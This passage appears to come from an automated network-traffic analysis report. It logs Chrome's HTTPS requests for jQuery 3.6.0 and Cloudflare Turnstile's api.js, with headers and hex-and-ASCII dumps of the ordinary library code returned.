                                                                                      2025-01-09 04:10:58 UTC1369INData Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41
                                                                                      Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.1649718151.101.2.1374437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:10:58 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                      Host: code.jquery.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:10:58 UTC613INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 89501
                                                                                      Server: nginx
                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                      ETag: "28feccc0-15d9d"
                                                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Thu, 09 Jan 2025 04:10:58 GMT
                                                                                      Age: 1880384
                                                                                      X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740031-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 2774, 1
                                                                                      X-Timer: S1736395859.699857,VS0,VE1
                                                                                      Vary: Accept-Encoding
                                                                                      2025-01-09 04:10:58 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                      Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                      2025-01-09 04:10:58 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                      Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                      2025-01-09 04:10:58 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                      Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                      2025-01-09 04:10:58 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                      Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                      2025-01-09 04:10:58 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                      Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                      2025-01-09 04:10:58 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                      Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.1649719104.18.95.414437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:10:59 UTC383OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:10:59 UTC471INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:10:59 GMT
                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                      Content-Length: 47521
                                                                                      Connection: close
                                                                                      accept-ranges: bytes
                                                                                      last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                                                                      cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                      access-control-allow-origin: *
                                                                                      cross-origin-resource-policy: cross-origin
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194a89e670f59-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2025-01-09 04:10:59 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                      Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                      2025-01-09 04:10:59 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                      Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                      2025-01-09 04:10:59 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                      Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                      2025-01-09 04:10:59 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                      Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                      2025-01-09 04:10:59 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                      Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                      2025-01-09 04:10:59 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                                      Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                                      2025-01-09 04:10:59 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                                      Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                                      2025-01-09 04:10:59 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                                      Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                                      2025-01-09 04:10:59 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                                      Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                                      2025-01-09 04:10:59 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                                      Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


